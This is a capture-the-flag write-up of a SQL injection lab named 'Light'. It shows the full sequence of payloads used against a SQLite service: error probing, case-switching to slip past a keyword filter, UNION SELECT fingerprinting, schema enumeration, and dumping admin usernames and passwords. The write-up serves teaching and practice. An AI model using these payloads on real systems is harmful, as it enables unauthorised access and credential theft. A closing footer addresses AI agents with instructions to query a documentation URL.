# Light {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** For this challenge, we will skip the Nmap scan. The room description already asks us to connect to port `1337`. We also get a user to start with. The service on `1337` could be the aforementioned database application called Light.

Since this is a database challenge, we try the simplest SQL Injection payload `'`. And we get an error returned. The service might be vulnerable to SQL Injection. The error message tells us about an unrecognized token in `''' LIMIT 30"`. We may have broken the enclosed string by `'`, which led to this error.

Now, let's try to get more information using a UNION SELECT injection. But it errors with our comment we used. ``` ' UNION SELECT 1 -- - ```

Alternately, we use `#` to comment, and do not receive a similar error as before. But there are words that get blocked. It might be UNION and SELECT. ``` ' UNION SELECT 1 # ```

We switch between capitalized and non capitalized characters. But still get an error. Might be the SELECT statement too. ``` ' UniOn SELECT 1 # ```

After applying the same technique to the SELECT statement, we now get a different error. The token `#` is not recognized. ``` ' UniOn SeLeCt 1 # ```

We URL encode the `#` character, but that does not help either. But we receive another error regarding the `'` character. ``` ' UniOn SeLeCt 1 %23 ```

So maybe there is a statement like this, that gets broken with inserting a `'`: ``` SELECT * FROM users WHERE username = '{user_input}' LIMIT 30; ``` Leading to: ``` SELECT * FROM users WHERE username = ''' LIMIT 30; ``` We close our statement with another `'`, and now have a successful UNION based injection. ``` ' UniOn SeLeCt 1 ' ```

Next, we query for the version, to determine which DBMS is used to craft the payloads to retreive the data from the database. It is a SQLite Database version 3.31.1. ``` ' UniOn SeLeCt @@version ' ' UniOn SeLeCt version() ' ' UniOn SeLeCt sqlite_version() ' ```

{% embed url="" %} Next we query from the `sqlite_master` to get the database structure. There is a `admintable` and a `usertable`. ``` ' UniOn SeLeCt group_concat(sql) FROM sqlite_master ' ```

We query username and password from the `usertable`, but do not find the asked information: ``` ' UniOn SeLeCt group_concat(username) FROM usertable ' ``` ``` ' UniOn SeLeCt group_concat(password) FROM usertable ' ```

Next, we query for the username and password from the `admintable` and do find the username, password and the asked flag. ``` ' UniOn SeLeCt group_concat(username) FROM admintable ' ``` ``` ' UniOn SeLeCt group_concat(password) FROM admintable ' ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2025/light.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.